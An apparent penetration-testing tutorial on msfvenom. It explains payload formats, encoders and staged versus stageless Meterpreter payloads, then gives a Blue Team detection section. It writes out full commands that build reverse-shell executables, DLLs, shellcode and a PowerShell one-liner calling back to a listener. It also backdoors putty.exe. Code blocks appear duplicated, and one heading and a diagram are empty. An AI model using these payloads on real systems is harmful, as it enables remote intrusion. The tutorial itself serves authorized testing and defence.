Generating Payloads with msfvenom: Formats, Encoders, and Staged vs Stageless

Introduction

Disclaimer: This article is for education and authorized security testing only. Generate, deliver, and execute payloads exclusively against systems you own or are explicitly permitted to test under a written engagement. Unauthorized use is illegal in most jurisdictions.

msfvenom is the payload generation and encoding component of the Metasploit Framework. It merged the legacy msfpayload and msfencode tools into a single CLI. For penetration testers it is the fastest way to turn a payload definition into a deliverable artifact — an executable, a DLL, raw shellcode, a web shell, or a one-liner.

In this article you will learn how msfvenom assembles a payload, the meaning of the key flags (-p, -f, -e, -b, LHOST/LPORT), and the critical operational distinction between staged and stageless payloads. We close with a Blue Team section because every artifact described here leaves detectable artifacts.

How it works / Background

A msfvenom invocation has three logical parts:

1. The payload (-p) — the code that runs on the target (e.g. a Meterpreter session, a reverse shell, exec of a command).
2. The format (-f) — how that code is packaged (exe, dll, elf, raw, psh, c, python, hex).
3. Optional transforms — encoders (-e), bad-character avoidance (-b), and iterations (-i) that reshape the bytes without changing behavior.

Staged vs stageless

This is the single most important concept and the most commonly misunderstood.

• Staged payloads (note the / separating segments): windows/meterpreter/reverse_tcp. A tiny first-stage "stager" is delivered to the target. Its only job is to open a socket back to the handler and download the much larger second stage (the actual Meterpreter DLL) into memory. The artifact on disk is small.
• Stageless (note the _ joining segments): windows/meterpreter_reverse_tcp. The entire payload is self-contained in the artifact. Nothing is pulled from the network after execution.

Trade-offs:

A frequent failure mode: starting a handler with windows/meterpreter/reverse_tcp (staged) for a stageless payload, or vice versa. The handler PAYLOAD must match the generated payload byte-for-byte in name.

Prerequisites / Lab setup

• Kali Linux (or any host with the Metasploit Framework installed).
• An isolated lab network. A Windows 10/11 VM and a Linux VM as targets.
• msfconsole available for the listener side.

Confirm the install and list available options:

msfvenom --list payloads | grep meterpreter | head
msfvenom --list formats
msfvenom --list encoders

msfvenom --list payloads | grep meterpreter | head
msfvenom --list formats
msfvenom --list encoders

Attack walkthrough / PoC

1. A basic staged Windows executable

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f exe -o shell_staged.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f exe -o shell_staged.exe

-p selects the staged x64 Meterpreter, LHOST/LPORT set the callback, -f exe packages a PE, and -o writes the file.

2. The matching handler

msfconsole -q -x "use exploit/multi/handler; \
  set PAYLOAD windows/x64/meterpreter/reverse_tcp; \
  set LHOST 10.10.14.7; set LPORT 4444; \
  set ExitOnSession false; run -j"

msfconsole -q -x "use exploit/multi/handler; \
  set PAYLOAD windows/x64/meterpreter/reverse_tcp; \
  set LHOST 10.10.14.7; set LPORT 4444; \
  set ExitOnSession false; run -j"

Note the PAYLOAD is identical to -p. For a stageless artifact you would generate windows/x64/meterpreter_reverse_tcp and set the handler PAYLOAD to the same _ form.

3. Stageless variant

msfvenom -p windows/x64/meterpreter_reverse_tcp \
  LHOST=10.10.14.7 LPORT=443 \
  -f exe -o shell_stageless.exe

msfvenom -p windows/x64/meterpreter_reverse_tcp \
  LHOST=10.10.14.7 LPORT=443 \
  -f exe -o shell_stageless.exe

Notice the file is substantially larger because the full Meterpreter is embedded.

4. Other formats

A Linux ELF reverse shell:

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f elf -o shell.elf

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f elf -o shell.elf

Raw shellcode as a C array for an injector or custom loader:

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.7 LPORT=8443 \
  -f c -v shellcode

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.7 LPORT=8443 \
  -f c -v shellcode

A PowerShell one-liner payload (useful for -EncodedCommand delivery):

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f psh-cmd -o payload.txt

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f psh-cmd -o payload.txt

A DLL for proxying / hijacking scenarios:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f dll -o evil.dll

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f dll -o evil.dll

5. Encoders and bad characters

Encoders were historically used for AV evasion, but modern AV/EDR signatures the classic x86/shikata_ga_nai decoder stub, so encoding alone is no longer evasion. Encoders remain genuinely useful for bad-character avoidance — removing bytes (like \x00, \x0a, \x0d) that break a vulnerable parser in exploit development.

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -i 3 \
  -f c

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -i 3 \
  -f c

-b lists bad bytes to avoid, -e picks the encoder, and -i 3 runs three iterations. For real-world evasion, prefer custom loaders, packers, or shellcode injection into a benign process — see Process Injection Techniques.

6. Embedding into a legitimate template

You can backdoor an existing PE with -x (template) and -k (keep original functionality), though signatures for this are mature:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -x /usr/share/windows-binaries/putty.exe -k \
  -f exe -o putty_backdoored.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -x /usr/share/windows-binaries/putty.exe -k \
  -f exe -o putty_backdoored.exe

Mermaid diagram

The diagram shows the artifact running on the victim, then either a staged second-stage download or a self-contained stageless payload, followed by the established reverse session back to the attacker's handler.

Detection & Defense (Blue Team)

Defenders should treat msfvenom artifacts as a well-characterized, signature-rich threat class. ATT&CK maps these to T1059 (Command and Scripting Interpreter), T1055 (Process Injection), and T1071 (Application Layer Protocol for C2).

Network detection

• The Meterpreter stager has a recognizable handshake. Suricata/Snort rulesets (e.g. Emerging Threats) flag reverse_tcp and reverse_https stage transfers. Watch for unexpected outbound TCP/443 or TCP/4444 from workstations.
• Enforce egress filtering and a forward proxy. Stageless payloads survive better on restricted links, but they still need outbound C2 — block default-deny egress and inspect TLS where policy allows. reverse_https will still present a self-signed or unusual certificate; JA3/JA3S and certificate anomaly detection catch many handlers.

Endpoint detection

• Microsoft Defender, and virtually every commercial EDR, detect default msfvenom output and the shikata_ga_nai decoder stub on disk and in memory. AMSI inspects PowerShell payloads at runtime, catching psh/psh-cmd one-liners and -EncodedCommand delivery.
• Enable AMSI, ASR rules (block executable content from email/USB, block process creations from Office macros), and WDAC/AppLocker so unsigned executables and DLLs cannot run.
• Hunt for reflective DLL loading: RWX private memory in a process with no backing file on disk is a strong Meterpreter indicator. Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess with 0x1F0FFF/0x1FFFFF access) surface injection. See Sysmon Threat Hunting.

Logging and response

• Enable PowerShell Script Block Logging (Event ID 4104) and command-line process auditing (Event ID 4688). Backdoored templates from -x still spawn anomalous child processes.
• Establish network baselines so a host suddenly beaconing to a new external IP is anomalous regardless of payload format.

The key defensive takeaway: encoders do not defeat modern defenses. Detection should focus on behavior (injection, anomalous egress, reflective loading) rather than static signatures alone.

Conclusion

msfvenom is deliberately simple: choose a payload, choose a format, optionally transform the bytes. The concepts that actually matter operationally are matching the handler PAYLOAD exactly and understanding the staged (/) versus stageless (_) trade-off between artifact size, network footprint, and reliability. Encoders are for bad-character avoidance, not evasion. For defenders, default msfvenom output is heavily signatured — the durable detections target runtime behavior, not file hashes.

References

• MITRE ATT&CK — Command and Scripting Interpreter (T1059): https://attack.mitre.org/techniques/T1059/
• MITRE ATT&CK — Process Injection (T1055): https://attack.mitre.org/techniques/T1055/
• MITRE ATT&CK — Application Layer Protocol (T1071): https://attack.mitre.org/techniques/T1071/
• Offensive Security / Rapid7 — Metasploit Framework documentation: https://docs.metasploit.com/
• HackTricks — Shells / msfvenom: https://book.hacktricks.xyz/
• Microsoft — Attack Surface Reduction rules: https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction